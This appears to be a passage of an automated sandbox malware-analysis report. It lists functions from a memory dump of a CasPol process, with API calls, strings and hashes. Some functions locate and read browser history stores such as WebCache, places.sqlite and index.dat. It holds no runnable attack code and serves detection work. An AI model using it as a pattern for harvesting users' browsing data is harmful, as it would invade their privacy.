                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                                                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                  Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                                                  • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                  Function 00430737 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                                                                                                  • API String ID: 0-1445880494
                                                                                                                                                                                                                                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                                                                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                                                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                                                                  • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000012.00000002.2149132643.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
